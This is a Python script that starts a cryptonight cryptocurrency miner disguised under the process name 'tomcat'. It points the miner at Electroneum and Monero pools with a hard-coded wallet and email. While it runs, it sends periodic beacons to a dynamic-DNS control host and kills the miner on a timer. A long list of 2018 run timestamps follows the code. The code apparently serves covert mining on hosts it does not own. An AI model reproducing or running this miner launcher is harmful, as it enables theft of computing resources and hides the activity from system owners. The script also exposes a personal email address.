import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:41:08.308573
#2018-02-17 16:28:06.361259
#2018-02-17 18:14:07.519737
#2018-02-17 20:02:06.387822
#2018-02-17 21:50:08.205081
#2018-02-17 23:36:07.370698
#2018-02-18 01:25:05.760595
#2018-02-18 03:12:05.628314
#2018-02-18 04:59:03.758481
#2018-02-18 06:51:04.006666
#2018-02-18 08:39:05.886250
#2018-02-18 10:25:07.038157
#2018-02-18 12:11:01.997173
#2018-02-18 13:57:04.589178
#2018-02-18 15:48:05.361147
#2018-02-18 17:37:01.844645
#2018-02-18 19:25:07.717285
#2018-02-18 21:10:06.148164
#2018-02-18 22:57:06.970785
#2018-02-19 00:45:06.972543
#2018-02-19 02:32:04.939557
#2018-02-19 04:18:01.265630
#2018-02-19 06:03:01.649709
#2018-02-19 07:51:03.968652
#2018-02-19 09:41:05.578478
#2018-02-19 11:31:07.365935
#2018-02-19 13:18:07.183682
#2018-02-19 15:06:07.558499
#2018-02-19 16:53:06.083746
#2018-02-19 18:39:05.872267
#2018-02-19 20:27:06.865771
#2018-02-19 22:16:08.318553
#2018-02-20 00:01:06.257458
#2018-02-20 01:49:02.180692
#2018-02-20 03:37:08.162450
#2018-02-20 05:24:07.148971
#2018-02-20 07:07:06.573824
#2018-02-20 08:53:02.099939
#2018-02-20 10:36:07.146105
#2018-02-20 12:22:01.334613
#2018-02-20 14:09:08.905779
#2018-02-20 15:52:07.200551
#2018-02-20 17:38:09.766364
#2018-02-20 19:27:06.076095
#2018-02-20 21:14:07.025995
#2018-02-20 22:58:05.531603
#2018-02-21 00:44:01.780316
#2018-02-21 02:30:09.824413
#2018-02-21 04:19:04.299329
#2018-02-21 06:06:06.494048
#2018-02-21 07:53:03.649609
#2018-02-21 09:38:03.824326
#2018-02-21 11:26:06.132946
#2018-02-21 13:16:07.932992
#2018-02-21 15:01:01.250653
#2018-02-21 16:49:10.456737
#2018-02-21 18:34:05.482230
#2018-02-21 20:19:01.712200
#2018-02-21 22:07:02.028794
#2018-02-21 23:54:01.920630
#2018-02-22 01:41:05.912425
#2018-02-22 03:29:05.934553
#2018-02-22 05:16:05.856313
#2018-02-22 07:02:03.720681
#2018-02-22 08:50:04.125123
#2018-02-22 10:38:07.767534
#2018-02-22 12:25:07.032378
#2018-02-22 14:10:01.270464
#2018-02-22 15:56:04.384231
#2018-02-22 17:42:06.993770
#2018-02-22 19:28:06.444981
#2018-02-22 21:20:09.717945
#2018-02-22 23:05:01.436173
#2018-02-23 00:51:04.956285
#2018-02-23 02:38:06.161418
#2018-02-23 04:27:03.983587
#2018-02-23 06:14:06.003522
#2018-02-23 08:01:04.061134
#2018-02-23 10:18:01.318802
#2018-02-23 12:08:06.834073
#2018-02-23 13:57:01.777610
#2018-02-23 15:48:08.344055
#2018-02-23 17:34:07.280435
#2018-02-23 19:20:06.996127
#2018-02-23 21:04:07.967367
#2018-02-23 22:50:04.271323
#2018-02-24 00:39:07.194273
#2018-02-24 02:29:01.377253
#2018-02-24 04:20:08.507701
#2018-02-24 06:08:03.822340
#2018-02-24 07:55:07.842941
#2018-02-24 09:39:06.337843
#2018-02-24 11:34:04.592267
#2018-02-24 13:24:05.714199
#2018-02-24 15:13:03.535983
#2018-02-24 17:02:04.304006
#2018-02-24 18:51:03.865966
#2018-02-24 20:40:05.782357
#2018-02-24 22:47:07.437938
#2018-02-25 03:03:01.303469
#2018-02-25 06:47:05.872186